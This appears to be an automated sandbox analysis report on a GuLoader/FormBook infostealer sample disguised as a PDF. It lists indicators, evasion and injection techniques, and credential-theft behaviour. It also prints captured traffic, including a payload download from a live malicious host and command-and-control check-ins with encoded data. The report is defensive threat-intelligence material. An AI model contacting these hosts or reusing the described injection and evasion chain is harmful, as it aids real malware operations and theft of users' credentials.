
Windows Analysis Report
S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe

Overview

General Information

Sample name: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe (renamed because original name is a hash value)
Original sample name: SPAR No.112024-pdf.bat.exe
Analysis ID: 1562046
MD5: f33b6e1067bf27d4bea237206532881e
SHA1: 5602bb70d47fb5f8061688b62b6f9b3bafd1a4bc
SHA256: 2ab9083b17140ee82b2d96fceecfc3ad8c286b320222b074719fe7a1852ab91a
Tags: bat, exe, geo, GuLoader, TUR, user-abuse_ch

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe (PID: 7560 cmdline: "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe" MD5: F33B6E1067BF27D4BEA237206532881E)
    • S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe (PID: 8088 cmdline: "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe" MD5: F33B6E1067BF27D4BEA237206532881E)
      • cXGDMXIloFhOE.exe (PID: 5592 cmdline: "C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sdchange.exe (PID: 2708 cmdline: "C:\Windows\SysWOW64\sdchange.exe" MD5: 8E93B557363D8400A8B9F2D70AEB222B)
          • cXGDMXIloFhOE.exe (PID: 3496 cmdline: "C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4108 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.2937577500.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.2937146077.00000000007E0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.2935957213.0000000000640000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.2937634910.0000000000F20000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.2633149796.00000000329F0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(3 further Yara entries not shown)
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-25T07:09:48.405139+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49839 | 195.110.124.133 | 80 | TCP
2024-11-25T07:09:05.328915+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49743 | 103.83.194.50 | 80 | TCP
2024-11-25T07:10:05.322973+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49875 | 104.21.95.160 | 80 | TCP


AV Detection

Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Virustotal: Detection: 15%
Source: Yara match | File source: 00000007.00000002.2937577500.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2937146077.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2935957213.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2937634910.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2633149796.00000000329F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2937326522.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2633741377.0000000033050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: sdchange.pdbGCTL | source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567118439.0000000002DB7000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567064883.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2936496818.0000000000728000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb | source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: cXGDMXIloFhOE.exe, 00000006.00000002.2936926532.0000000000EEE000.00000002.00000001.01000000.0000000A.sdmp, cXGDMXIloFhOE.exe, 00000008.00000000.2687039028.0000000000EEE000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: wntdll.pdbUGP | source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2506460914.0000000032B57000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504045336.00000000329A4000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.0000000004710000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2611022611.000000000455B000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2608657007.00000000043AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2506460914.0000000032B57000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504045336.00000000329A4000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.0000000004710000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2938037138.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2611022611.000000000455B000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2608657007.00000000043AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP | source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmp
Source: Binary string: sdchange.pdb | source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567118439.0000000002DB7000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567064883.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2936496818.0000000000728000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 0_2_00402868 FindFirstFileW,0_2_00402868

Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49839 -> 195.110.124.133:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49875 -> 104.21.95.160:80
Source: Joe Sandbox View | IP Address: 195.110.124.133
Source: Joe Sandbox View | IP Address: 103.83.194.50
Source: Joe Sandbox View | IP Address: 103.83.194.50
Source: Joe Sandbox View | ASN Name: REGISTER-ASIT
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49743 -> 103.83.194.50:80
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
  GET /tk.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
  Host: enechado.ru.com
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /vlg0/?s42t_Nbx=qomJeF/TtZ0QUZ/lu9XGw5rEDKlC0VH3n7TxRqREffWgONqaapTJswa8a+ti36YSjfwaEcz7GfWHOzY8D/KxwVpCEXfXsdPRTHALBjA15rmVzjOLWJp7K7s=&F0vD=qVTlJB1hk6Wd HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Host: www.officinadelpasso.shop
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Source: global traffic | DNS traffic detected: DNS query: enechado.ru.com
Source: global traffic | DNS traffic detected: DNS query: www.officinadelpasso.shop
Source: global traffic | DNS traffic detected: DNS query: www.vayui.top
Source: unknown | HTTP traffic detected:
  POST /4twy/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Encoding: gzip, deflate
  Accept-Language: en-us
  Host: www.vayui.top
  Origin: http://www.vayui.top
  Referer: http://www.vayui.top/4twy/
  Cache-Control: max-age=0
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 205
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
  Data Ascii: s42t_Nbx=rDqkmhD2LOnTx9r8fsbmz2O8iMCWFPWMxCjInk6mgfjHlriPmAc3X4sUFi9iHyygyrOEH/TOXCELA4+/OdXFHdI9jSyoEy58b5wu1TWm/EqS7IKcirT5fWI3ufJGJCaT9Y1nhs5jFoQW4ennhbczoNO7xidksnN5THYHhXm0J95FsUPgWEEmqlmOVIr1dqMC2Q==
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Mon, 25 Nov 2024 06:09:48 GMT
  Server: Apache
  Content-Length: 203
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vlg0/ was not found on this server.</p></body></html>
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Mon, 25 Nov 2024 06:10:05 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  cf-cache-status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BEwHlfkuX1XBoKn060kgOYQVkjIkdeCrBYmcS1n4baMNJm3QfEvFO4Yk3k3h8G8sxB4vf29TZj4c%2BmdukNc2eU5n87BwRj2KZtYO9XsDdgIdHL1c0MbRnJDb119sRSYA"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8e7f793d6f090cae-EWR
  Content-Encoding: gzip
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1493&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=712&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  Data Raw: [gzip-compressed chunked body omitted]
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2603801719.0000000002D48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://enechado.ru.com/tk.bin
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2603801719.0000000002D48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://enechado.ru.com/tk.binJ
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmp | String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: cXGDMXIloFhOE.exe, 00000008.00000002.2937146077.0000000000835000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.vayui.top
Source: cXGDMXIloFhOE.exe, 00000008.00000002.2937146077.0000000000835000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.vayui.top/4twy/
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.00000000005F2000.00000008.00000001.01000000.00000009.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.00000000005F2000.00000008.00000001.01000000.00000009.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmp | String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: sdchange.exe, 00000007.00000002.2936326745.00000000008A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: sdchange.exe, 00000007.00000002.2936326745.00000000008A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sdchange.exe, 00000007.00000002.2936326745.00000000008A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: sdchange.exe, 00000007.00000002.2936326745.00000000008A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: sdchange.exe, 00000007.00000002.2936326745.00000000008A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sdchange.exe, 00000007.00000003.2801057785.000000000775E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: sdchange.exe, 00000007.00000003.2811482528.0000000007778000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040542B

E-Banking Fraud

Source: Yara match | File source: 00000007.00000002.2937577500.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2937146077.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2935957213.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2937634910.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2633149796.00000000329F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2937326522.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2633741377.0000000033050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D735C0 NtCreateMutant,LdrInitializeThunk,4_2_32D735C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72B60 NtClose,LdrInitializeThunk,4_2_32D72B60
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_32D72C70
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_32D72DF0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D74340 NtSetContextThread,4_2_32D74340
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D73090 NtSetValueKey,4_2_32D73090
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D73010 NtOpenDirectoryObject,4_2_32D73010
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D74650 NtSuspendThread,4_2_32D74650
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72AD0 NtReadFile,4_2_32D72AD0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72AF0 NtWriteFile,4_2_32D72AF0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72AB0 NtWaitForSingleObject,4_2_32D72AB0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72BF0 NtAllocateVirtualMemory,4_2_32D72BF0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72BE0 NtQueryValueKey,4_2_32D72BE0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72B80 NtQueryInformationFile,4_2_32D72B80
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72BA0 NtEnumerateValueKey,4_2_32D72BA0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D739B0 NtGetContextThread,4_2_32D739B0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72EE0 NtQueueApcThread,4_2_32D72EE0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72E80 NtReadVirtualMemory,4_2_32D72E80
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72EA0 NtAdjustPrivilegesToken,4_2_32D72EA0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72E30 NtWriteVirtualMemory,4_2_32D72E30
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72FE0 NtCreateFile,4_2_32D72FE0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72F90 NtProtectVirtualMemory,4_2_32D72F90
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72FB0 NtResumeThread,4_2_32D72FB0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72FA0 NtQuerySection,4_2_32D72FA0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72F60 NtCreateProcessEx,4_2_32D72F60
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72F30 NtCreateSection,4_2_32D72F30
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72CC0 NtQueryVirtualMemory,4_2_32D72CC0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72CF0 NtOpenProcess,4_2_32D72CF0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72CA0 NtQueryInformationToken,4_2_32D72CA0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72C60 NtCreateKey,4_2_32D72C60
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72C00 NtQueryInformationProcess,4_2_32D72C00
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72DD0 NtDelayExecution,4_2_32D72DD0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72DB0 NtEnumerateKey,4_2_32D72DB0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D73D70 NtOpenThread,4_2_32D73D70
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D73D10 NtOpenProcessToken,4_2_32D73D10
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72D10 NtMapViewOfSection,4_2_32D72D10
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72D00 NtSetInformationFile,4_2_32D72D00
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D72D30 NtUnmapViewOfSection,4_2_32D72D30
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | File created: C:\Windows\resources\0809
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | File created: C:\Windows\resources\0809\mysterist.ini
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 0_2_00404C68
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 0_2_0040698E
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 0_2_6FBC1B63
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D5B2C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D5D2F0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32DE12ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D452A0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32DE0274
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32E003E6
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D4E3F0
